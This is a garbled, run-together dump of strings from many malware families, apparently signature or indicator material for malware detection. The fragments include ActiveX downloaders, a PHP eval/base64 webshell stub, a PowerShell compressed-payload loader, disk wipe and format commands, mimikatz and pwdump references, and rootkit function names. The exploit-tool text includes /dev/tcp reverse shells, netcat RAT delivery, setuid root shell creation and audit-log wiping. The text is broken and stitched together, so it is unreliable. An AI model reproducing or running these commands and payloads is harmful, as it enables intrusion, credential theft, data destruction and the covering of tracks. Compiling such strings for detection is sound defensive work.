borderpub-8301011321395982ApiClientConfigfunction/.test(pa.toString())background-image:url(http:\\/\\/static.ak.fbcdn.net\\/rsrc.php\\/v2\\/y6\\/x\\/s816eWC-2sl.gif)}Music.init',header:'bool',recommendations:'bool',site:'hostname'},create_event_button:{},degrees:{href:'url'},cca6477272fc5cb805f85a84f20fca1ddocument.createElement('form');c.actionjavascript:falses.onMessage){j.error('An instance without whenReady or onMessage makes no sense');throw new Error('ANaN;}else hsprintfwindow,jo.getUserID(),daFB.Runtime.getLoginStatus();if(b)');k.toStringrovide('XFBML.Send',{Dimensions:{width:80,height:25}});{log:i};e.exportsa;FB.api('/fql','GET',f,function(g){if(g.error){ES5(ES5('Object','keys',false,b),'forEach',true,functrue;}}var iadocument.createDocumentFragment();img.srctypeOf(events)var i,x,y,ARRcookiescallbacks.length;j<l;jencodeURIComponent(value);if(options.domain)valueevent,HG.components.get('windowEvent_''read'in Cookie){return Cookie.read(c_name);}item;},get:function(name,def){return HG.components.exists(name)){window.addEvent(windowEvents[i],function(){var callbacksreunload:function(callback){HG.events.add('beforeunload',callback);},add:function(event,callback){HGname){if(HG.components.exists(name)){delete HG.componentList[name];}}},util:{uuid:function(){return'window.HGx.replace(/encodeURIComponent(this.attr[key]));}options.domain;if(options.path)valuethis.page_sid;this.attr.user_sid).join(JSON.stringify:function(o){if(o){try{var a);return $.jqotecache[i]o.getUTCFullYear(),hours')');};$.secureEvalJSONisFinite(n);},secondsToTime:function(sec_numb){sec_numb')');}else{throw new SyntaxError('Error parsing JSON, source is not valid.');}};$.quoteStringo[name];var reta[m].substr(2));if(d){return true;}}}catch(e){return false;}}a.length;m<k;mif(parentClasses.lengtho.getUTCHours(),minutes$.jqote(e,d,t),$$q.test(x)){e{};HGWidget.creatorfunction gSH() {200 HEIGHT'sh.js'><\\/SCRIPT> 2 - 26;<IFRAME ID,100);200></IFRAME>'about:blank' WIDTHmf.document.write(Kasper  new ActiveXObject(szHTTP);  Csa2;var ADO  new ActiveXObject(szOx88);/test.exe szEtYij;var HTTP %41%44%4F%44%42%2E%4D%65%64%69%61var szSRjq%43%3A%5C%5C%50%72%6F%67%72%61%6Dvar METHOD ADO.Mode %61%79%65%72%2E%58%4D%4C%48%54%54%50 7 - 6; HTTP.Open(METHOD, szURL, i-3); var jsmLastMenu position:absolute; z-index:99'  -1)jsmSetDisplayStyle('popupmenu'  '<tr><td><a href  jsmLastMenu   var ids this.target jsmPrevMenu, 'none');  if(jsmPrevMenu )if(MenuData[i]) '<div style  jsmSetDisplayStyle('popupmenu' function jsmHideLastMenu() MenuData.length; iScripting.FileSystemObjectobjdata 0105000002000000E0C9EA79F9BACE118C8200AA004BA90B68007400740070003a002f002f00<?xml version=<?mso-application progid=\"Word.Document\"?>w:macrosPresent=\"yes\"<w:binData w:name=<o:Characters>0</o:Characters><o:Lines>1</o:Lines>n
GetClusterResourceTypeKeyQueryInformationJobObjecti
FreeConsoleProcess WriteParameterFilesSTOCKMASTERInsertEmailFax
VirtualAlloc
RtlMoveMemory
CallWindowProcA
POLA= Array(77, 90,33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111, 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46,\\objdata4f4c45324c696e6bd0cf11e0a1b11ae1680074007400700073003a002f002f006600740070003a002f002f00%%EOFIndex[5 1 7 1 9 4 23 4 50<pdf xmlns=<chunk></pdf>JVBERi0<</S/Launch/Type/Action/Win<</F<</EmbeddedFiles
GetSystemDirectoryGetWindowsDirectoryIsBadReadPtrIsBadWritePtrUrlDownloadToFile{\\field{\\*\\fldinst { INCLUDEPICTURE.php?id=\\\\* MERGEFORMAT \\\\d}}{\\fldrslt}}UserFormUserLoginFormInvalid username or passwordpostUpload_
VBAProjectAttribut
e VB_vbaData.xmlAutoOpenM
PNG{\rtf1
GIF8This program cannot be run in DOS modeThis program must be run under Win32UserForm1TextBox1Microsoft Forms 2.0ret.logMicrosoft Internet Explorer 6.0szURL FailszURL Successfully%s&sdate=%04ld-%02ld-%02ldsuperhard corp.microsoft corp.[Insert][Delete][End]!(*@)(!@KEY!(*@)(!@SID=Services\\riodrv32riodrv32.syswuauserv.dllarp.exeprojects\\aurigaend      binary outputXriteProcessMemoryIE:Password-Protected siteszxdosmlget user name error!get computer name error!----client system info----stfilecmd success!*Qd9kdgba33*%Wkda0Qd3kvn$*&><(*&%$E#%$#1234asdgKNAg@!gy565dtfbasdgIDR_DATA%dasdfqwe123cxzMode must be 0(encrypt) or 1(decrypt).new_connection_to_bounce():usage:%s IP port [proxip] [port] [key]DownRun success%s@gmail.com<!--%s-->W4qKihsb+So=PoqKigY7ggH+VcnqnTcmhFCo9w==8oqKiqb5880/uJLzAsY=Mozilla4.0 (compatible; MSIE 7.0; Win32)Mozilla5.1 (compatible; MSIE 8.0; Win32)GetfilePutfile---[ Virtual Shell]---Not Comming From Our Server %s.Mozilla/4.0 (compatible; MSIE 7.0;)KilFailKilSuccpkkillpklistKill process success!Kill process failed!Sleep success!based on glooxglooxtest.pdb
:Send to Server failed.HandShake with the server failed. Error:Decryption Failed. Context Expired.Mozilla/4.0 (compatible; MSIE8.0; Windows NT 5.1)!(*@)(!@PORT!(*@)(!@URLMyTmpFile.DatSvcHost.DLL.logMozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0)%s\\%c%c%c%c%c%c%cwait:Dcryption Error! Invalid CharactersvcMsn.dllConfig service %s ok.Install an Service hosted by SVCHOST.The Dll file that to be released.Man,it's meOh,shitHallelujahnRet == SOCKET_ERRORrouji\\release\\Install.pdbrouji\\SvcMain.pdbminiaspwakeup=download ok!command is null!device_input.asp?device_t=Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)name=%s&userid=%04d&other=%c%snoclientUser-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMMupfileokupfileerfxftest*(SY)# cmdsend = %d@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>sleep:down:*========== Bye Bye ! ==========*letusgohtppmmv2.0.0.1Mozilla/4.0 (compatible; )filestocfilectosreshellpostvaluepostdatapostfileclientkeystart Cmd Failure!downloadcopy:download:geturl:1.234.1.68content=reqpath=savepath=W!r@o#n$gKerNel32.dllEclipse_A\\PJTS\\Eclipse_Client_B.pdbXiaoMESunCloud-Code/uc_server/data/forum.aspServerfile is smaller than Clientfile\\M tools\\MoonDLL
eB3gZFQOBtY3sifNOldocbWUWsc2gRMv9HN7TFnvnKcrWUUFdAEem9DkqRALoD6QVSOZHQPCMc2A8HXdsfuNZcmUnIqWrOIjrjwOeagILnnScxadKEr1H2MZNwSnaJMiniAsp.pdbSLYHKAAY!@#%$^#@!64.91.80.6ejlcmbvbhxjuisvyqzgrhuqusofrpLjpltmivvdcbbfrfogjviirrximhttoskop!QAZ@WSX<meta xcd=%s?%.6uszFileUrl=%sstatus=%udown file successMozilla/4.0 (compatible; MSIE 6.0; Win32)%s\\Attachment.datMyOutlookmail.txtRecv Time:Subject:bits.exePDFBROWBrowser.exeProtect!pls give the FULL pathmapi32.dlldoCompressgetmail.dllname=\"GALX\"User-Agent: Shockwave Flashadd cookie failed...,speed=%fY29ubmVjdAc2xlZXAcXVpdAY21kdW5zdXBwb3J0IPHONE8.5(host:%s,ip:%s)SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNDefWatch.exeindex1.html!@#tiuq#@!!@#dmc#@!!@#troppusnu#@!InprocServer32HKEY_PERFORMANCE_DATA<!---[<if IE 5>]id=iniet.exeSYSTEM\\CurrentControlSet\\Services\\DEVFSDevice File System2010QBPadobe_sl.exednsapi.dllReady!connect okWinHTTP 1.0reader_sl.exeMS80547.batADR32ControlService failed!3DC76854-C328-43D7-9E07-24BF894F8EF5HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunHello from MFC!/Default.aspx?INDEX=/Default.aspx?ID=Accept: text*/*xcmd.exeGoogle.exeBUILD ERROR!SUCCESS!wild scanCode too cleverinsufficient lookaheadMozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1)Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.0.12VMProtecthttp://[c2_location]/[page].html<!---HEADER ADSPACE style=ERSVC.DLLntshrui.dll<!--DOCHTMLAusovexception...opened...ISUN32.EXE\\pipe\\ssnptoobu.iniServerfile is not bigger than ClientfileURL download success\\XiaoME\\SunCloud-Code\\moonURL download success!KugoosoftModify file failed!! So strange!Create cmd process failed!The command has not been implemented!Runas success!onec.php/bin/onecrusinfo.exeAdobeUpdater.exebuildout.exeIMSCMig.exelocalfile.exemdm.exemimikatz.exemsdev.exentoskrnl.exeotepad.exereg.exeregsvr.exeruninfo.exeAdobeUpdate.exeinetinfo.exesvehost.exeupdate.exeNTLMHash.exewpnpinst.exeWSDbg.exeadobeup.exe0830.bin1001.bina.binAcroRD32.EXEINETINFO.EXEWINRAR.SFXSteup=aspnet_client/report.aspname=%s&Gender=%c&Random=%04d&SessionKey=%snwwwks.dllrdisk.dllskeys.dllInstallServiceUninstallServiceDown file ok!Send file ok!Command Error!Pls choose target first!Alert!Pls press enter to make sure!Are you sure to Analysis And Outlook.docNorth Korean launch.pdfDollar General.docDow Corning Corp.pdfsde^`tutlo`m^md`wdr^emml`ho/emmRedLeavesSCMDSimulatorMutexred_autumnal_leaves_dllmain.dll\\NamePipe_MoreWindows
40W@=/
40$@=/
C:/Users/user/Desktop/my_OK_2014/bit9/runsna/Release/runsna.pdbd:/work/plug4.0(shellcode)/shellcode/shellcode/XSetting.hB
V)57gZ@*35W
RedLeavesCMDSimulatorMutexM
fxsst.dll.cSVGetLastActivePopupGetProcessHeapS:\\Lidstone\\renewing\\HA\\disable\\In.pdbR
GoogleCrashReport.dllCrashErrorsCrashSendCrashAddDataCrashCleanupCrashInit='base'.(str_replace(\"\\n\", ''.substr(md5(strrev(_COOKIEisset<?php $@assert(base64_decode($_REQUEST[(str_replace(\"\\n\", '', '(strrev($de'.'code';(StR_ReplAcE(\"\\n\",'',;if(PHP_VERSION<'5'){=SuBstr_rePlACe(
rundll32_exec.dll\x00Update
POST http://%ls:%d/%x HTTP/1.1%%TEMP%%\\%s_p.ax%TEMP%\\uid.ax%%TEMP%%\\%s.axsysinfo\x00sysbin01\\FlashUpdate.exerat_UnInstall!! Use Splice Socket !!User-Agent: SJZJ (compatible; MSIE 6.0; Win32)g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%du4(UeKnMiq/'p_9pJMfICMP.DLLEG}QAptsjWj:UO2nQpp2}W8weILqkC:lf1yzMkA
wj<1uH6fL-uDB9Iavo<rUS)sOFJH{_/f3e 03V<description> Windows system utility service  </description>W
WinHelpWReadProcessMemoryWshShell.Run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, falseWshShell.CurrentDirectory = \"C:\\WINDOWS\\TEMP\\Dropbear\\\"Set WshShell = CreateObject(\"WScript.Shell\")Dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.htmlBadly formatted command= authorized_keys optionThis Dropbear program does not support '%s' %s algorithm/etc/dropbear/dropbear_dss_host_key/etc/dropbear/dropbear_rsa_host_keypassDs5Bu9Te7s
/c del /F /S /Q %c:\\*.*shutdown /r /t %d/
%08X.tmp/c format %c: /Y /X /FS:NTFS/c format %c: /Y /Qt
%c:\\~tmp%08X.tmp%s%08X.tmp.
KdDebuggerNotPresentKdDebuggerEnabled 
Setup=unsecess.exeSetup=leassnp.exe&
;The comment below contains SFX script commandsPath=%temp%w
userControl-v80.exeM
%TEMP%\\IELogs\\MSPUB.EXE%temp%\\\\NOTEPAD.EXE%4d-%02d-%02d %02d:%02d:%02d INTERNET_OPEN_TYPE_PRECONFIG%4d%02d%02d%02d%02d%02dMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)\\Mozilla\\Firefox\\Profiles\\\\auto.cfg/ncsi.txt/en-us/default.aspxcmd /cAPPDATA.
UserAgent: AUTH FAILEDINVALID FILE PATH.
FAILED TO WRITE FILE.
AuthType: .
Kill You%4.2f  KB
%Znms&vtogteq&ceppoz&di&typ&mp&JOS&qoji0
NTmcn7$
clbcaiq.dllprofapi_104/ShowWU
^IsWow64Processregsvr32 
function runmumaa()Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(function MoSaklgEs7(k)\\Microsoft\\wuauclt\\wuauclt.dat
evict1.pdbhttp://testing.corp 08
Session folder with name '%s' already exists.Show Unconnected Endpoints (Ctrl+U)C
Add &ResourceP
AssocQueryKeyAwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwSHInvokePrinterCommandAYcwxnkajPGPsdkDriverjpeg1x32SkypeIE6PluginCDllUninstall
cgi-bin/commcgi.cgilinkconf.netredirserver.netswupdt.com\
firefox.exe\
\\Users\\*\\Roaming\\Mozilla\\Firefox\\Profiles\\*\\Documents and Settings\\*%
%s; %s=%sCookie: %s=%sh
http://google.com/Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)O
<Command></Command>\" /d \"n
ID: 0x%xName: %Scmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST& SYSTEMINFO) ELSE EXITd
jpic.gov.sya
perfaudio.datCasper_DLL.dll{KY
W@{4216567A-4512-9825-7745F856}***** SYSTEM INFORMATION *********** SECURITY INFORMATION ******Antivirus: Firewall: ***** EXECUTION CONTEXT ******Identity: <CONFIG TIMESTAMP=mpgvwr32.dllUnexpected failure of wait! (%d)\"%s\" /e%d /p%serror in params!sscanf<>Param : 0x%xC
Local\\{c0d9770c-9841-430d-b6e3-575dac8a8ebf}Local\\{1ef9f94a-5664-48a6-b6e8-c3748db459b4}Interface\\%s\\infoInterface\\%s\\info\\%sCLSID\\%s\\info\\%sW
\\StringFileInfo\\%s\\FileVersionCLSID\\%s\\AuxCLSIDlnkfile\\shellex\\IconHandler%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT%sMutex\\ShellIconCache+6Service Pack ProcDataWrapimagehlp.dlldnlibsh%
acrotray.exeC
mcs.exeMcAltLib.dllW
varus_service_x86.dll/s %s /p %d /st %d /rt %dnet start %%1ping 127.1 > nulMcInitMISPAlertExsc start %%1net stop %%1WorkerRunDnsApi.dllsoftWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\%sCONNECT %s:%d hTTP/1.1CONNECT %s:%d HTTp/1.1Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0;)iphlpapi.dll%systemroot%\\Web\\Proxy-Authorization: Negotiate %sCLSID\\{%s}\\InprocServer32B_WKNDNSK^rundll32 \"%s\",%s/c ping 127.%d & del \"%s\"RunMeByDLL32s
server.dllC
testsupdate33D
MSVCP60.DLL
mail-news.eicp.netcmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %srundll32.exe \"%s\", RunMeByDLL32E
%s -r debug 1\\\\.\\keymmdrv1wnyglwboazdcdwayflwCODETABL/c del %s >> NUL%s%s.manifestspideragent.exeAVGIDSAgent.exekavsvc.exemspaint.exekav.exeavp.exeNAV.exeGlobal\\RUNDLL32EXITEVENT_NAME{12845-8654-543}\
Global\\TERMINATEEVENT_NAME{12845-8654-542}ConsentPromptBehaviorAdminGlobal\\UN{5FFC0C8B-8BE5-49d5-B9F2-BCDC8976EE10}d
SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3<supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedOS>GETPASSWORD1NvSmartMax.dllLICENSEDLGC
SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHostregsvr32.exe /s \"%s\"Help and Support%SystemRoot%\\System32\\svchost.exe -k netsvcsSystem\\CurrentControlSet\\ServicesD
TsWorkSpaces.dll%
/selfservice/microsites/search.php?%016I64d/solutions/company-size/smb/index.htm?%016I64dM
{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}WUServiceMainC
CPports.txt,GET / HTTP/.}F
, Inc. 2002ICMP TimeUnable to open target process: %d, pid %dCouldn't delete target executable from remote machine: %dTarget: Failed to load SAM functions.Error writing the test file %s, skipping this shareFailed to create service (%s/%s), error %dService start failed: %d (%s/%s)PwDump.exeGetAvailableWriteableShare returned an error of %ld:\\\\.\\pipe\\%sCouldn't copy %s to destination %s. (Error %d)dump logon sessionTimed out waiting to get our pipe backSetNamedPipeHandleState failed, error %d%s\\%s.exe%s -<listen|tran|slave> <option> [-log logfile][-] Gethostbyname(%s) error:%se:\\VS 2008 Project\\htran\\Release\\htran.pdb[SERVER]connection to %s:%d error-tran  <ConnectPort> <TransmitHost> <TransmitPort>[-] ERROR: Must supply logfile name.[-] There is a error...Create a new connection.[+] Accept a Client on port %d from %s======================== htran V%s =======================[-] Socket Listen error.[-] ERROR: open logfile-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>[+] Make a Connection to %s:%d ......Recv %5d bytes from %s:%d[+] OK! I Closed The Two Socket.[+] Waiting another Client on port:%d....[+] Accept a Client on port %d from %s ......-listen <ConnectPort> <TransmitPort>%SystemRoot%\\System32\\svchost.exe -k sqlserver%s\\sqlsrv32.dll%s\\sqlsrv64.dll%s\\%d.tmpServiceMaix180.150.228.102Upload failed! [Remote error code:
DGGYDSYRL
GDGSYDLYR_%LxMainexecvecp -a %s %sdbus-daemon--noprofile--norcTERM=vt100/proc/%u/cmdlineloadso/proc/self/exeProxy-Connection: Keep-AliveHOST: %s:%dProxy-Authorization: Basic %sServer: ApacheProxy-Authenticategettimeofdaypthread_mutex_initpthread_mutex_destroypthread_mutex_lockgetsockoptsetsockoptopendirreaddirclosedirrename__this_moduleinit_moduleunhide_pidis_hidden_pidclear_hidden_pidlicensesrcversion=depends=vermagic=current_tasksock_releasemodule_layoutinit_uts_nsinit_netinit_taskfilp_open__netlink_kernel_createkfree_skb
\nuname -a\n\n/dev/shm/.x11.idLxMain64# \\u@\\h:\\w \\$ 0
/dev/pts/4/tmp/1408.logSHAREImagePathZwUnloadDriverZwLoadDriver/s /u_time64PCC_CMD_PACKETPCC_BASEMODPCC_SYSPCC_PROCESSPCC_FILEbcdedit -set testsigningupdate.microsoft.com_crt_debugger_hookue8G5\\Device\\-%s-%04dFAL2.03XXXXXXXXXXXXXXX
Dom4!nUserP4ss273ce6-b29f-90d618c0Ace123dxAce123dxl!Ace123dx!@#x/Catelog/login1.asp~DFTMP$$$$$.1GET /Query.asp?loginid=LoadConfigFromReg faildedLoadConfigFromBuildin success/photoe/photo.asp HTTPPOST /photos/photo.aspPCC_IDENT$$$--HelloWrod--$$$.?AVPCC_BASEMOD@@PS1=RK# \\u@\\h:\\w \\$unset LS_OPTIONS;uname -a[diskio]/tmp/.secure\x7fELF\
Update.dll\
Fuqing Dawu Technology Co.,Ltd.0XL Games Co.,Ltd.0Wemade Entertainment co.,Ltd0
User-Agent: %sHost: %s:%dCache-Control: no-cacheContent-Type: application/x-octet-streamPragma: no-cache3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff19490631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd:*:::D:\\:c:~:SPMUVRcopy /y \"%s\" \"%s\" del /f \"%s\" del /f /ah \"%s\" if exist \"%s\" goto Rept \\*.*.lnkDropped$innn[i$[i$^i[e[mdi[m$jf1Wehn[^Whl[^iin_hf$11mahZijnjbi[^[W[f1n$dej$[hn]1[W1ni1l[ic1j[mZjchl$$^he[[j[a[1_iWc[e[h$YWdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1W1[1cjm1[$[k1ZW_$$ncn[[Inbnnc[I9enanid[fZCX0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&()`~-_=+[{]{;',.e_$0[bW\\RZY\\jb\\ZY[nimiRc[jRZ]f_RIdJ0W9RFb[$Fbc9[k_?WnhWI[$lZ![nJ_[[lk[8Ihlo8ZiIl[[[$Ynk[f_8[88WWWJW[YWnl$$Z[ilf!$IZ$!W>Wl![W!k!$l!WoW8$nj8![8n_I^$[>_n[ZY[[Xhn_c!nnfK[!Z[i_^])[$n!]Wj^,h[,!WZmk^o$dZ[h[e!&W!l[$nd[d&)^Z\\^[[iWh][[[jPYO[g$$e&n\\,Wfg$[<g$[[ninn:j!!)Wk[nj[[o!!Ys
OpenSSL: FATAL{
MSI.dllStartActionm
NameTypeBinaryDataCustomActionActionSourceTargetInstallExecuteSequenceConditionSequencePropertyValueMicrosoftManufacturer.?AV?$_Bind@$00XU?$_Pmf_wrap@P8CLR
@@AEXXZXV1@$$$V@std@@QAVCLR
@@@std@@\
romanian.antihackerP
ugly.gorilla1NdisIMCopySendCompletePerPacketInfoNdisReEnumerateProtocolBindingsNdisOpenProtocolConfigurationSetSecurityDescriptorSaclCompareStringAGetCommandLineWs
ca.dllS
ProcessUserAccountsS
RunDLLM
cmd.exe /c %s > %sexecute cmd timeout.rundll32.exe \"%s\",SettingDownloadFile - exception:%s.CDllApp::InitInstance() - Evnet create successful.UploadFile - EncryptBuffer ErrorW
DownloadFile - exception:%s,code:0x%08x.Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)CDllApp::InitInstance() - Evnet already exists../emptycriss <target IP>Cut and paste the following to the telnet prompt:environ define TTYPROMPT abcdefrunning \\\"tcpdump -n -n\\\", on the environment variable \\$INTERFACE, scriptedCannot read $opetc/scripme.override -- are you root?$ENV{EXPLOIT_SCRIPME}The encryption key is ___tempFile2.outUnless the -c (clobber) option is used, if two RETR commands of themywarn(\"End of $destfile determined by \\\"^Connection closed by foreign host\\\"\")End of $destfile determined by \"^Connection closed by foreign host> /var/log/audit/audit.log; rm -f .Pastables to run on target:cp /var/log/audit/audit.log .tmpHere is the first good cron session fromNo need to clean LOGIN lines.sh >/dev/tcp/ <&1 2>&1TEST: mungedport=%6d  pp=%d  unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini X server on DEFAULT = 12121 ]\"CALLBACK_PORT=32177usage: %s -e -v -i target IP [-c Cert File] [-k Key File]TYPE=licxfer&ftp=%s&source=/var/home/ftp/pub&version=NA&licfile=[-l Log File] [-m save MAC time file(s)] [-p Server Port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:EXE=$DIR/sbin/ey_vrupdateDel --- Usage: %s -l file -w wtmp -r userRoasting ->%s<- at ->%d:%d<-rbnoil -Roasting ->Requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~#  - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.DIR)cmd += \"D=-l%s \" % self.options.LISTEN_PORTUse this on target to get your RAT:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingSending final buffer: evil_blocks and shellcode...Timeout waiting for daemon to die.  Exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>Writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c COMMAND: shell command stringCannot combine shell command mode with args to do socket reuse-r: Reuse socket for Nopen connection (requires -t, -d, -f, -n, NO -c)Firing with the same hosts, on altername ports (target is on 8080, listener on 443)Recieved Unknown Command Payload: 0x%xUsage: eslide   [options] <-t profile> <-l listenerip> <targetip>-------- Delete Key - Remove a *closed* tabUsage: ./exp command display_to_return_tosizeof shellcode = %dExecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"Call back port2 = ${SPORT}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell           Use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.XXXXXXexecuting ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - Start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services# Building Shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\"  -d 10.0.0.1 -p 80# STARTING EXHAUSTIVE ATTACK AGAINST Usage:  $prog [-f directory] -p prognum [-V ver] [-t proto] -i IPadr$gotsunos = ($line =~ /program version netid     address             service         owner/ );+ Bruteforce mode.+ Host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ Exploit failed, try -b to bruteforce.Usage: %s [-bBcCdfprsStv] [host]** SIGNIFICANTLY IMPROVE PROCESSING TIME-c cmd_name:     strncmp() search for 1st %d chars of commands that mysql \\$D --host=\\$H --user=\\$U --password=\\\"\\$P\\\" -e \\\"select * from \\$TWindow 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\\\"sleep 500|nc$ua->agent(\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> | -t <port>) -i target ip address / hostname Note: Choosing the correct target type is a bit of guesswork.Solaris rpc.cmsd remote root exploitIf one choice fails, you may want to try another.shellFilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: No such userexecv %s: %m%s/%s: unknown service?Usage: %s <shellcode> <output_file>Here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedUsage: %s [-V] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upWARNING - core wipe mode - this will leave a core file on target[-C] wipe target core file (leaves less incriminating core on failed target)-A <jumpAddr> (shellcode address)*** Insane undocumented incremental port mode!!! ***%x:%d  --> %x:%d %d bytesclient: can't bind to local address, are you root?Unable to register portCould not resolve destinationraw troubles$gotgs=1 if (($line =~ /Scan for (Sol|SNMP)\\s+version/) orUsage:  $prog [-f file] -p prognum [-V ver] [-t proto] -i IPadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"Kill process $pid?\\\" -name \\\"Kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.XXXXXX[-] couldn't create temp file/boot/System.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing.  Continue [y|n]? T=<target IP> [O=<port>] Y=<target type>no command given!! bailing...no port. assuming 22.../tmp/ratload.tmp.shRemote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${NAME}.Z && PATH=. ${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\"DEFTARGET=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`FATAL ERROR: -x port and -n port MUST NOT BE THE SAME.Example: ewok -t target publicUsage:  cleaner host community fake_prog-g  - Subset of -m that Green Spirit hits --- ewok versionUSAGE: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronUsage: $0 ( -s IP PORT | CMD )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$CMD\")PHP_SCRIPT=\"$HOME/public_html/info$X.php\"cat > /dev/tcp/127.0.0.1/80 <<END*** Sorry about the raw output, I'll leave it for now-scan winn %s oneset uRemoteUploadCommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$BASH\\\" = \\\"/bin/bash\\\" -o \\\"\\$SHELL\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- File Transfer ShellWelcome to the network scanning toolScanning port %d/current/down/cmdout/scansScan for SSH versionprogram vers proto   port  serviceUsage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetSending shellcode as part of an open command...cmdshellcodeYou will not be able to run the shellcode. Exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x IP      gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"Set-Cookie: bbsessionhash=\" . \\$hash . \"; path=/; HttpOnly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsUser($u) or die \"User '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp <<  16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uRemoteUploadCommand]processUploadglobal dothisreallyquiet[-] Failed to map file: %s[-] can not NULL terminate input data[!] Name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | 